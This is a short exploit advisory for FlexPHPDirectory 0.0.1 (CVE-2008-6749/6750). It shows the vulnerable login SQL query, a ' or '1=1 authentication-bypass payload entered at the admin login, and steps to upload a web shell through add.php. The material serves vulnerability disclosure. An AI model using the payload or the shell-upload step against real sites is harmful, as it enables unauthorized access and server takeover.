FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability

2009-04-27 / 2009-04-28

Credit: x0r

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6749 | CVE-2008-6750

CWE: CWE-89
CWE-20

#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphpdiren
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpdir/
##############################################

Bug In \admin\usercheck.php 'n' \add.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";


Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Shell Upload:

Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^

Greetz: I Miss You...

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.